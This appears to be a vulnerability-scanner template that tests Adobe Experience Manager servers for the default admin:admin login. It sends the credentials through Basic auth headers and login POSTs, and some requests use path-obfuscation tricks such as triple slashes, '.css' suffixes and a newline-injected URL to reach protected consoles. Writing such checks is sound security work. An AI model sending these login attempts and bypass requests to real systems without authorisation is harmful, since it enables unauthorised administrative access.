id: aem-default-admin-credentials
info:
  name: AEM Default Admin Credentials
  risk: Critical

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/system/console/bundles
    headers:
      - User-Agent: curl/7.0
      - Authorization: Basic YWRtaW46YWRtaW4=
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "Web Console - Bundles")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/system/console/bundles.css
    headers:
      - User-Agent: curl/7.0
      - Authorization: Basic YWRtaW46YWRtaW4=
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "Web Console - Bundles")
  - method: GET
    redirect: false
    url: >-
      {{.root}}///system///console///bundles.css
    headers:
      - User-Agent: curl/7.0
      - Authorization: Basic YWRtaW46YWRtaW4=
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "Web Console - Bundles")
  
  - method: GET
    redirect: false
    url: >-
      {{.root}}/libs/fd/af/cloudservices/recaptcha/meta/meta.html
    headers:
      - User-Agent: curl/7.0
      - Authorization: Basic YWRtaW46YWRtaW4=
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "${meta.title}") && StringSearch("response", "com.adobe.forms.foundation.cloudconfig.IMeta")

  # new login
  - method: POST
    redirect: false
    url: >-
      {{.root}}/libs/granite/core/content/login.html/j_security_check
    headers:
      - User-Agent: curl/7.0
      - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      - CSRF-Token: undefined
      - Referer: '{{.BaseURL}}'
    body: >-
      _charset_=utf-8&j_username=admin&j_password=admin&j_validate=true
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "login-token=") && !StringSearch("response", "invalid_login")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/system/sling/loginstatus.json%0aa.css
    headers:
      - Authorization: Basic YWRtaW46YWRtaW4=
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "userid=admin")

  # new login crx
  - method: POST
    redirect: false
    url: >-
      {{.root}}/crx/de/j_security_check
    headers:
      - User-Agent: curl/7.0
      - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      - CSRF-Token: undefined
      - Referer: '{{.BaseURL}}'
    body: >-
      j_username=admin&j_password=admin&j_workspace=crx.default&j_validate=true&_charset_=utf-8
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "login-token=") && !StringSearch("response", "session_timed_out")
